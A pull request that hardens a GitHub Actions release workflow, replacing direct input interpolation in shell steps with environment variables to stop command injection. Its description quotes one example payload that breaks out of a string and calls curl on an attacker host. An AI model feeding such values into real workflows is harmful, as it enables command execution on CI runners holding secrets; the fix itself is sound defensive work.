### PR TITLE
chore: fix shell injection in web-release-start workflow

### DIFF
--- a/.github/workflows/web-release-start.yml
+++ b/.github/workflows/web-release-start.yml
@@ -47,10 +47,13 @@ jobs:
 
       - name: Determine base branch
         id: base
+        env:
+          INPUT_BASE_BRANCH: ${{ inputs.base_branch }}
+          INPUT_RELEASE_TYPE: ${{ inputs.release_type }}
         run: |
-          if [ -n "${{ inputs.base_branch }}" ]; then
-            BASE="${{ inputs.base_branch }}"
-          elif [ "${{ inputs.release_type }}" = "hotfix" ]; then
+          if [ -n "$INPUT_BASE_BRANCH" ]; then
+            BASE="$INPUT_BASE_BRANCH"
+          elif [ "$INPUT_RELEASE_TYPE" = "hotfix" ]; then
             BASE="main"
           else
             BASE="dev"
@@ -60,15 +63,18 @@ jobs:
 
       - name: Determine version
         id: version
+        env:
+          INPUT_VERSION: ${{ inputs.version }}
+          INPUT_RELEASE_TYPE: ${{ inputs.release_type }}
         run: |
-          if [ -n "${{ inputs.version }}" ]; then
+          if [ -n "$INPUT_VERSION" ]; then
             # Validate provided version format
-            if ! [[ "${{ inputs.version }}" =~ ^[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
+            if ! [[ "$INPUT_VERSION" =~ ^[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
               echo "❌ Invalid version format. Expected: X.Y.Z where X, Y, Z are numbers (e.g., 1.74.0)"
-              echo "Received: '${{ inputs.version }}'"
+              echo "Received: '$INPUT_VERSION'"
               exit 1
             fi
-            VERSION="${{ inputs.version }}"
+            VERSION="$INPUT_VERSION"
             echo "✅ Using provided version: $VERSION"
           else
             # Auto-increment version based on release type
@@ -92,7 +98,7 @@ jobs:
               exit 1
             fi
 
-            if [ "${{ inputs.release_type }}" = "hotfix" ]; then
+            if [ "$INPUT_RELEASE_TYPE" = "hotfix" ]; then
               # Hotfix: increment patch version (last number)
               PATCH=$((PATCH + 1))
               echo "🔧 Hotfix: incrementing patch version"
@@ -181,6 +187,7 @@ jobs:
         id: create_pr
         env:
           GH_TOKEN: ${{ secrets.RELEASE_BOT_TOKEN }}
+          INPUT_RELEASE_TYPE: ${{ inputs.release_type }}
         run: |
           cd apps/web
 
@@ -222,7 +229,7 @@ jobs:
 
           ---
 
-          **Release Type:** ${{ inputs.release_type }}
+          **Release Type:** ${INPUT_RELEASE_TYPE}
           **Base Branch:** ${{ steps.base.outputs.branch }}
 
           🤖 *This PR was created automatically by the [Start Web Release workflow](https://github.com/${{ github.repository }}/actions/workflows/web-release-start.yml)*
@@ -244,9 +251,11 @@ jobs:
       - name: Notify on Slack
         if: vars.SLACK_WEBHOOK_URL
         continue-on-error: true
+        env:
+          INPUT_RELEASE_TYPE: ${{ inputs.release_type }}
         run: |
           VERSION="${{ steps.version.outputs.version }}"
-          RELEASE_TYPE="${{ inputs.release_type }}"
+          RELEASE_TYPE="$INPUT_RELEASE_TYPE"
           BASE_BRANCH="${{ steps.base.outputs.branch }}"
           PR_URL="${{ steps.create_pr.outputs.pr_url }}"
 
@@ -271,11 +280,13 @@ jobs:
               -d @-
 
       - name: Summary
+        env:
+          INPUT_RELEASE_TYPE: ${{ inputs.release_type }}
         run: |
           echo "### 🎉 Release Started Successfully!" >> $GITHUB_STEP_SUMMARY
           echo "" >> $GITHUB_STEP_SUMMARY
           echo "**Version:** v${{ steps.version.outputs.version }}" >> $GITHUB_STEP_SUMMARY
-          echo "**Type:** ${{ inputs.release_type }}" >> $GITHUB_STEP_SUMMARY
+          echo "**Type:** $INPUT_RELEASE_TYPE" >> $GITHUB_STEP_SUMMARY
           echo "**Base Branch:** ${{ steps.base.outputs.branch }}" >> $GITHUB_STEP_SUMMARY
           echo "**PR:** ${{ steps.create_pr.outputs.pr_url }}" >> $GITHUB_STEP_SUMMARY
           echo "" >> $GITHUB_STEP_SUMMARY


### PR DESCRIPTION
## Summary

Resolves https://linear.app/safe-global/issue/WA-1692/shell-injection-via-direct-interpolation-of-workflow-dispatch-inputs

- Replace direct `${{ inputs.* }}` interpolation in `run:` blocks with environment variables in `web-release-start.yml`
- Direct interpolation is evaluated before the shell executes, allowing crafted input values (e.g. `"; curl attacker.com; echo "`) to break out of string context and run arbitrary commands
- Environment variables are treated as data by the shell, preventing injection regardless of input content

This is a standard GitHub Actions hardening pattern per [GitHub's security guidance](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#using-an-intermediate-environment-variable).

## Affected inputs

| Input | Type | Risk |
|-------|------|------|
| `base_branch` | free-text string | **injectable** (now fixed) |
| `version` | free-text string | **injectable** (now fixed) |
| `release_type` | choice (regular/hotfix) | not injectable, but hardened for consistency |

## Test plan

- [ ] Trigger the workflow with a normal version (e.g. `1.75.0`) and verify it works
- [ ] Trigger with auto-increment (empty version) and verify it works
- [ ] Trigger a hotfix release and verify branch selection works

🤖 Generated with [Claude Code](https://claude.com/claude-code)